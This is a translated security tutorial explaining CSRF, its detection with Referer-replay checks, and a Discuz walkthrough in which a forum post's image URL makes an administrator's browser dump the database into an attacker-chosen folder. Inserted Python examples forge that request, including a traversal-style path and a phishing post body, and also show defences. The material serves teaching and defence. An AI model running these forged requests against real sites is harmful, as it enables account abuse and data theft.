CSRF attack technology

Time:2022-4-23

1. Understand CSRF

"Cross-site request forgery", CSRF for short. In a CSRF attack the attacker forges a request (usually delivered as a link) and tricks the target user into clicking it. Once the user clicks, the whole attack is complete, which is why CSRF is also called a "one-click" attack.

CSRF is also known informally as a "cross-site request attack". In short, the attacker uses some technical means to make the user's browser visit a site the user has already authenticated to and perform an operation there (sending e-mail or messages, or even property operations such as transferring money or buying goods). Because the browser already holds a valid session for that site, the site processes the forged request as a genuine user action.

What is exploited here is a weakness in how the web authenticates users: the attacker steals your identity and sends malicious requests in your name. CSRF can therefore be used to send e-mail or messages in your name, take over your account, and even buy goods or transfer virtual currency; the consequences range from disclosure of personal privacy to loss of property.

To sum up, the developer does not validate a CSRF token or the Referer on the relevant pages, so the attacker can construct a URL of their own and trick the target user into clicking it.

2. CSRF principle:

 

As the figure above shows, to complete a CSRF attack the victim must go through two steps:

Log in to the trusted site (the bank website), so that the browser holds a valid session cookie for it.

Without logging out of the bank website, visit the attacker's phishing page (the "beauty link").

3. CSRF classification:

CSRF vulnerabilities are generally divided into two types, off-site and on-site:

3.1 Off-site

Off-site CSRF vulnerabilities are essentially the traditional external data submission problem. Programmers usually consider adding a token (a "watermark") to forms such as messages or comments to prevent spam (spam messages, spam comments, or malicious replies carrying off-site links). Sometimes, however, in order to improve the user experience, some operations are left unprotected, so an attacker can predict and pre-set the request's parameters, then write a script on an off-site web page that forges the request, or use an automatically submitted form to produce GET and POST requests. When a user who still has a valid session clicks the link and visits that off-site page, the browser is forced to issue the request.

3.2 On-site

On-site CSRF vulnerabilities come, to some extent, from programmers misusing variables such as $_REQUEST. For sensitive operations (changing a password, adding a user, and so on) the user was supposed to pass parameters by submitting a POST request from a form, but because $_REQUEST and similar variables are used, the program accepts the parameters from a GET request as well as from a POST request, which creates the conditions for a CSRF attack. Generally the attacker only needs to put the predicted request parameters into an image link in a post or message on the site itself; any victim who views that page is forced to issue the request.
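The two-step attack flow from the previous section and the off-site/on-site split above can be made concrete with a toy "transfer" endpoint. The following is an added example, not code from the original post or from any real forum software: one handler mimics PHP's $_REQUEST behaviour (GET and POST merged, cookie is the only check), the other adds the three checks that stop the attack. The session store, the Request class, the origin https://bank.example and the attacker host evil.example are all assumptions.

```python
"""Added example: a toy 'transfer' action handled two ways, plus the two
forged requests the text describes (on-site <img> GET and off-site
auto-submitted POST form). All names and hosts here are hypothetical."""
import hmac
import secrets
from dataclasses import dataclass, field

TRUSTED_ORIGIN = "https://bank.example"   # assumed site origin

# Server-side session store: cookie value -> session state.
# Constructed sample data: the victim is already logged in.
SESSIONS = {
    "sid-victim": {"user": "alice", "balance": 1000,
                   "csrf_token": secrets.token_hex(16)},
}


@dataclass
class Request:
    method: str
    cookies: dict
    query: dict = field(default_factory=dict)    # GET parameters
    form: dict = field(default_factory=dict)     # POST body parameters
    headers: dict = field(default_factory=dict)


def handle_vulnerable(req):
    """Mimics a PHP handler reading $_REQUEST: GET and POST parameters are
    merged, there is no token or Origin/Referer check, only the cookie counts."""
    session = SESSIONS.get(req.cookies.get("sid"))
    if session is None:
        return 401, "not logged in"
    params = {**req.query, **req.form}           # the $_REQUEST-style merge
    amount = int(params["amount"])
    session["balance"] -= amount
    return 200, f"sent {amount} to {params['to']}"


def handle_hardened(req):
    """Same action with the checks the text's defences imply: a state change
    needs POST, a same-site Origin/Referer, and a per-session CSRF token."""
    session = SESSIONS.get(req.cookies.get("sid"))
    if session is None:
        return 401, "not logged in"
    if req.method != "POST":
        return 405, "method not allowed"
    source = req.headers.get("Origin") or req.headers.get("Referer", "")
    if not source.startswith(TRUSTED_ORIGIN):
        return 403, "cross-site request rejected"
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, session["csrf_token"]):
        return 403, "bad csrf token"
    amount = int(req.form["amount"])
    session["balance"] -= amount
    return 200, f"sent {amount} to {req.form['to']}"


def onsite_img_request(cookies):
    """On-site CSRF: <img src="/transfer?to=mallory&amount=100"> placed in a
    post on the trusted site. The browser sends a GET with the victim's
    cookie and a same-site Referer."""
    return Request("GET", cookies, query={"to": "mallory", "amount": "100"},
                   headers={"Referer": TRUSTED_ORIGIN + "/forum/thread/42"})


def offsite_form_request(cookies):
    """Off-site CSRF: a hidden form on evil.example auto-submitted by script.
    The browser sends a POST, still carrying the victim's cookie."""
    return Request("POST", cookies, form={"to": "mallory", "amount": "100"},
                   headers={"Origin": "https://evil.example",
                            "Referer": "https://evil.example/cute-cat.html"})


def legitimate_request(cookies):
    """The real form: the token rendered into the page is sent back."""
    token = SESSIONS[cookies["sid"]]["csrf_token"]
    return Request("POST", cookies,
                   form={"to": "bob", "amount": "10", "csrf_token": token},
                   headers={"Origin": TRUSTED_ORIGIN})


def run_scenarios():
    """Return the status code each handler gives each kind of request."""
    cookies = {"sid": "sid-victim"}
    results = {}
    for name, build in [("onsite_img", onsite_img_request),
                        ("offsite_form", offsite_form_request),
                        ("legitimate", legitimate_request)]:
        results[("vulnerable", name)] = handle_vulnerable(build(cookies))[0]
        results[("hardened", name)] = handle_hardened(build(cookies))[0]
    return results


if __name__ == "__main__":
    for (handler, scenario), status in run_scenarios().items():
        print(f"{handler:10s} {scenario:13s} -> {status}")
```

Note that the on-site <img> request carries a perfectly good same-site Referer: a Referer check alone stops only the off-site case, which is why the hardened handler also refuses GET for state changes and demands the token.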

4. CSRF vulnerability detection:

Capture a normal request, remove the Referer header and resubmit it. If the request is still accepted, and it carries no unpredictable per-session token, the endpoint can basically be assumed to have a CSRF vulnerability. (A server that ignores the Referer but validates a token is not vulnerable, so also replay the request with the token removed or altered before drawing a conclusion.)

Taking the CSRFTester tool as an example, the testing principle of such a CSRF detection tool is as follows: while testing with CSRFTester we first record all the links and forms visited in the browser, then modify the corresponding forms and other information in CSRFTester and resubmit them, which is equivalent to forging a client request. If the modified test request is accepted by the server, there is a CSRF vulnerability. Of course, the same tool can also be used to carry out CSRF attacks.
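The manual check above (capture, strip the Referer, resubmit, compare) is easy to automate. The following is an added example, not part of the original post or of CSRFTester: two tiny loopback servers stand in for the target, one that never looks at the Referer and one that rejects missing or foreign Referers, and the check replays a constructed "captured packet" against each. The path /admin/backup, the cookie sid=admin and the form body are stand-ins, not real Discuz parameters.

```python
"""Added example: automate 'replay the captured request without its Referer'
against a local target. Servers, path, cookie and body are constructed."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def make_handler(check_referer):
    class BackupHandler(BaseHTTPRequestHandler):
        def do_POST(self):
            self.rfile.read(int(self.headers.get("Content-Length", 0)))
            if "sid=admin" not in self.headers.get("Cookie", ""):
                return self._reply(401, b"login required")
            referer = self.headers.get("Referer", "")
            same_site = referer.startswith(f"http://{self.headers['Host']}/")
            if check_referer and not same_site:
                return self._reply(403, b"cross-site request rejected")
            return self._reply(200, b"backup started")

        def _reply(self, code, body):
            self.send_response(code)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):   # keep the demo server quiet
            pass
    return BackupHandler


def start_server(check_referer):
    server = HTTPServer(("127.0.0.1", 0), make_handler(check_referer))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def http_send(port):
    """Transport used by the check: POST the request to the target and
    return (status, body) so that replays can be compared exactly."""
    def send(headers, body):
        conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
        conn.request("POST", "/admin/backup", body=body, headers=headers)
        resp = conn.getresponse()
        result = (resp.status, resp.read())
        conn.close()
        return result
    return send


def csrf_referer_check(send, captured_headers, body):
    """Replay the captured request (a) unchanged, (b) with Referer removed,
    (c) with a foreign Referer. Report 'suspected CSRF' when (b) and (c) get
    the same successful answer as (a): the server never consulted the Referer."""
    baseline = send(captured_headers, body)
    no_referer = {k: v for k, v in captured_headers.items()
                  if k.lower() != "referer"}
    foreign = dict(captured_headers, Referer="http://evil.example/page.html")
    replays = [send(no_referer, body), send(foreign, body)]
    return baseline[0] == 200 and all(r == baseline for r in replays)


def captured_request(port):
    """Constructed 'captured packet': what the proxy shows for the admin's
    own legitimate backup request (session cookie, same-site Referer, form)."""
    headers = {
        "Host": f"127.0.0.1:{port}",
        "Cookie": "sid=admin",
        "Referer": f"http://127.0.0.1:{port}/admin/db.php",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    return headers, "backdir=backup_20220423&type=full"


def assess(check_referer):
    """Start a target of the given kind, run the check, tear it down."""
    server = start_server(check_referer)
    port = server.server_address[1]
    try:
        headers, body = captured_request(port)
        return csrf_referer_check(http_send(port), headers, body)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("Referer ignored  -> CSRF suspected:", assess(check_referer=False))
    print("Referer enforced -> CSRF suspected:", assess(check_referer=True))
```

The check compares the whole (status, body) pair rather than just the status, because many applications answer 200 to a rejected action and put the error in the page. As the caveat above says, a server that ignores the Referer may still be protected by a token; extend the check by also replaying with the token parameter removed or altered.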

5. Quick database dump via a CSRF vulnerability (Discuz)

5.1 Log in to Discuz as an administrator;

 

5.2 Check the database backup directory of the Discuz site;

 

5.3 Back up the database as an administrator

 

 

 

By default the backup is written into the website's own directory tree. We capture the request in Burp Suite to look at its request headers.

 

Now we delete the backup files just created and simulate an ordinary user posting: create an ordinary test user in Discuz, log in as that user, and open the posting page.

 

From this step on, the phishing-post attack begins. For example, our simulated user sends the site administrator a complaint (administrators pay close attention to this kind of message). When the administrator opens the phishing post constructed by the simulated user, the phishing attack completes and the database dump is obtained.

In the steps above we saw that by default the site backs up the database to C:\phpstudy\phptutorial\www\Discuz\data. We want the site to back up the database to C:\phpstudy\phptutorial\www\Discuz\uc_server\data\backup instead.

 

We construct our own backup address:

 

 

Fill this address into the "network picture path" field of the post and submit it to the local server.

 

 

 

Next, log in to the administrator account and open the phishing post sent by the simulated user.

 

The administrator's interface shows the post sent by the simulated user. Click it.

 

As soon as the post body is displayed, the phishing address has already quietly backed up the site's database to the specified location. Earlier we named the backup folder myself and the database AAAA.

 

Above: the database folder and the backup path.

 

Above: the database name AAAA. After these steps the database dump has been obtained, which is one of the typical ways of exploiting a CSRF vulnerability.

The prerequisite for this phishing attack is that the administrator is logged in and still holds a live session with the admin center (UCenter). Note also that if the phishing does not succeed, one more place may need changing: because we changed the database backup path to our own, if the server IP changes it must also be updated in the IP cache UCenter uses for the accessed server.
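The attack in this section is, mechanically, "take the administrator's own backup request, change one parameter, and plant the result as an image URL in a post". The following is an added example, not code from the original post, from Discuz or from UCenter: it rebuilds a forged URL from a captured one, emits the post body, and shows the server-side allowlist that would have removed the attacker's control over the destination. The URL shape /admin/backup.php?action=export&dbname=...&backdir=... is a hypothetical stand-in for the real endpoint (the page only shows the backdir parameter); the attacker's traversal-style value is likewise an illustration.

```python
"""Added example: forge the backup request described in section 5 and show
a server-side allowlist for backdir. Endpoint path is a stand-in, the names
myself, yourself and AAAA come from the text."""
import html
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Constructed: the request the proxy showed for the admin's own backup,
# writing to the default location.
CAPTURED_URL = ("http://forum.example/admin/backup.php"
                "?action=export&dbname=AAAA&backdir=backup_20220423")


def forge_backup_url(captured_url, backdir):
    """Keep every parameter the admin's browser sent and replace only
    backdir, so the dump is written where the attacker chooses."""
    parts = urlsplit(captured_url)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    params["backdir"] = backdir
    return urlunsplit(parts._replace(query=urlencode(params)))


def phishing_post(forged_url):
    """The 'network picture path' of a forum post. Any administrator who
    views the thread has their browser GET this URL with admin cookies."""
    return ('<p>Hello admin, a user keeps posting spam, please check!</p>'
            f'<img src="{html.escape(forged_url, quote=True)}" alt="">')


def forged_backdir(url):
    """What the server would receive as backdir for a given URL."""
    return dict(parse_qsl(urlsplit(url).query)).get("backdir")


# Server side: a backup directory parameter must be a plain name that stays
# inside the backup root, never a path. Combined with requiring POST and a
# CSRF token (see the earlier handler example), the attacker can neither
# trigger the backup nor pick where it lands.
_SAFE_DIRNAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def backdir_is_safe(value):
    """Allowlist: letters, digits, '_' and '-' only; rejects '/', '\\',
    drive letters, '..', empty and missing values."""
    return bool(_SAFE_DIRNAME.fullmatch(value or ""))


if __name__ == "__main__":
    # Hypothetical attacker value: climb out of data/ into uc_server/data/backup/myself
    evil = forge_backup_url(CAPTURED_URL, "../uc_server/data/backup/myself")
    print(evil)
    print(phishing_post(evil))
    for candidate in ("yourself", "myself", "../uc_server/data/backup/myself",
                      "..\\uc_server\\data\\backup\\myself", "C:/wwwroot/x"):
        print(f"{candidate!r:45} safe={backdir_is_safe(candidate)}")
```

The allowlist is deliberately stricter than "no ..": rejecting every separator and drive letter is simpler to reason about than normalising a path, and a backup directory never needs anything beyond a plain name.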

 

6. Modifying the request with Burp Suite

Besides the phishing attack above, we can also use Burp Suite to intercept the backup request and change the backup folder name directly; the phishing address constructed above can likewise be built by editing the request that Burp Suite captured.

6.1 After setting up the proxy, open the UCenter module.

 

6.2 Similarly, choose database backup and intercept the request in Burp Suite to modify it.

 

6.3 Modify backdir=yourself

 

As shown in the figure below, the database has been backed up under the directory name supplied in the modified request.

 

This is a typical application of a CSRF vulnerability.

7. Database backup file features (extra topic)

It can be observed that in the database backup, each file name is the database name followed by a serial number.

 

This numbering comes from the forum's backup routine, which writes the dump as numbered volumes (MySQL itself does not split dumps this way). It mainly addresses segmented compression and segmented backup when the database is very large: it reduces the processing load on the server, avoids compressed files so large that some compression tools cannot unpack them, and avoids the extra cost of decompressing one huge file.

 
